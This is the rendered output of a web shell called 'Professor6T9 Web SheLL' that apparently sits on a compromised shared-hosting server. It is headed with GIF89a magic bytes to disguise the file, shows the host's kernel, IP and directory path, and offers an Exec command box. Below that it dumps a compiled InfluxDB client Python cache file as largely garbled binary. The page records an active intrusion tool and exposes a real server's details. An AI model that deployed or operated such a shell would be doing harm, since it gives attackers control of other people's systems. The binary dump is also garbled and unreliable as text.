GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux das102.truehost.cloud 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64
LiteSpeed
156.232.88.2
/
opt
/
alt
/
python38
/
lib
/
python3.8
/
site-packages
/
influxdb_client
/
domain
/
__pycache__
[ HOME ]
Exec
Submit
File Name : http_notification_endpoint.cpython-38.pyc
U ܒi�$ � @ s4 d Z ddlZddlZddlmZ G dd� de�ZdS )a InfluxDB OSS API Service. The InfluxDB v2 API provides a programmatic interface for all interactions with InfluxDB. Access the InfluxDB API using the `/api/v2/` endpoint. # noqa: E501 OpenAPI spec version: 2.0.0 Generated by: https://openapi-generator.tech � N)�!NotificationEndpointDiscriminatorc @ sj e Zd ZdZdddddddddddddddddddd�Zd d ddd ddddddddddddddd�ZdCdd �Zed!d"� �Zej d#d"� �Zed$d%� �Z e j d&d%� �Z ed'd(� �Zej d)d(� �Zed*d+� �Zej d,d+� �Zed-d.� �Z e j d/d.� �Z ed0d1� �Zej d2d1� �Zed3d4� �Zej d5d4� �Zed6d7� �Zej d8d7� �Zd9d:� Zd;d<� Zd=d>� Zd?d@� ZdAdB� ZdS )D�HTTPNotificationEndpointz�NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. �strzdict(str, str)�datetimezlist[Label]ZNotificationEndpointBaseLinksZNotificationEndpointType)�url�username�password�token�method�auth_method�content_template�headers�id�org_id�user_id� created_at� updated_at�description�name�status�labels�links�typer r r r r Z authMethodZcontentTemplater r ZorgIDZuserIDZ createdAtZ updatedAtr r r r r r N�active�httpc C s� t j| | | ||| ||||||d� d| _d| _d| _d| _d| _d| _d| _d| _ d| _ || _|dk rl|| _|dk rz|| _ |dk r�|| _|| _|| _|dk r�|| _|dk r�|| _dS )z6HTTPNotificationEndpoint - a model defined in OpenAPI.)r r r r r r r r r r r N)r �__init__�_url� _username� _password�_token�_method�_auth_method�_content_template�_headersZ discriminatorr r r r r r r r )�selfr r r r r r r r r r r r r r r r r r r � r% �b/opt/alt/python38/lib/python3.8/site-packages/influxdb_client/domain/http_notification_endpoint.pyr N s. "z!HTTPNotificationEndpoint.__init__c C s | j S )z�Get the url of this HTTPNotificationEndpoint. :return: The url of this HTTPNotificationEndpoint. :rtype: str )r �r$ r% r% r&